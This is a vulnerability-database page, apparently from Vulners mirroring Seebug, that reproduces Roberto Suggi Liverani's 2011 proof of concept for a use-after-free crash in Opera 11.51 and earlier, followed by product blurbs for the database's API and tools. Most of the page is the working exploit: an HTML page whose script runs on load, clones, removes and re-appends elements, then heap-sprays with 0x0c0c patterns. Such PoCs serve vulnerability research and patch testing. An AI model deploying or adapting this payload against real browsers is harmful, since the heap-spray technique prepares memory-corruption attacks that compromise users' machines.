Lucene search
K

Opera <= 11.51 Use After Free Crash PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

Opera Use After Free Crash PoC. Exploits vulnerability in Opera <= 11.5

Code

                                                # Exploit Title: Opera Use After Free - Crash PoC
# Date: 20 October 2011
# Author: Roberto Suggi Liverani
# Software Link: www.opera.com
# Version: 11.51 and previous versions
# Tested on: Windows XP and Windows 7
# CVE : n/a
# Link: http://malerisch.net/docs/advisories/opera_use_after_free_crash_poc.html

&#60;html&#62;
&#60;head&#62;
&#60;script&#62;

function spray() {
for(S=&#34;\u0c0c&#34;,k=[],y=0;y++&#60;197;)y&#60;20?S+=S:k[y]=[S.substr(22)+&#34;\u4141\u4141&#34;].join(&#34;&#34;)

}

function crash(){
// Clone Object -&#62; Remove Object - &#62; Append Reference)
obj = document.body.children[0].cloneNode(true)
document.body.removeChild(document.body.children[0])
document.body.appendChild(obj)

// Clone Object -&#62; Remove Object - &#62; Append Reference)
obj = document.body.children[0].cloneNode(true)
document.body.removeChild(document.body.children[0])
document.body.appendChild(obj)

// Clone Object -&#62; Remove Object - &#62; Append Reference)
obj = document.body.children[0].cloneNode(true)
document.body.removeChild(document.body.children[0])
document.body.appendChild(obj)

// Clone Object -&#62; Remove Object - &#62; Heap Spray

obj = document.body.children[1].cloneNode(true)
document.body.removeChild(document.body.children[1]);
spray(); // if this is removed Opera won&#39;t crash
}

&#60;/script&#62;
&#60;/head&#62;
&#60;body onload=&#34;crash();&#34;&#62;

&#60;em contenteditable=&#34;true&#34;&#62;a&#60;/em&#62;
&#60;strong contenteditable=&#34;true&#34;&#62;a&#60;/strong&#62;

&#60;/body&#62;
&#60;/html&#62;

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
12